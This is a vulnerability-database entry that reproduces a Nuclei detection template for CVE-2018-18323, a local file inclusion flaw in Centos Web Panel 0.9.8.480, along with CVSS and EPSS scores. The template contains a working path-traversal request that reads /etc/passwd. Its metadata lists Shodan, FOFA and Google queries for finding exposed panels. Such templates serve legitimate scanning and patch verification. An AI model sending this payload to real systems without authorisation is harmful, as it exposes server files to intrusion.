Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-18323
HistoryDec 01, 2021 - 2:26 a.m.

Centos Web Panel 0.9.8.480 - Local File Inclusion

2021-12-0102:26:28
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.9 High

AI Score

Confidence

High

0.949 High

EPSS

Percentile

99.3%

Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
id: CVE-2018-18323

info:
  name: Centos Web Panel 0.9.8.480 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server.
  remediation: |
    Upgrade to a patched version of Centos Web Panel.
  reference:
    - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
    - http://centos-webpanel.com/
    - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18323
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-18323
    cwe-id: CWE-22
    epss-score: 0.95438
    epss-percentile: 0.99372
    cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: control-webpanel
    product: webpanel
    shodan-query: http.title:"login | control webpanel"
    fofa-query: title="login | control webpanel"
    google-query: intitle:"login | control webpanel"
  tags: cve2018,cve,centos,lfi,packetstorm,control-webpanel,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a004630440220573467f2d253679a8ca0abe62ede74d07eb4b89953992c906843c11cad9a695e02201a0f31679a22b7dbe2e68ad75b65e94e48e09602d688d256fa627afd2f05dc5a:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.9 High

AI Score

Confidence

High

0.949 High

EPSS

Percentile

99.3%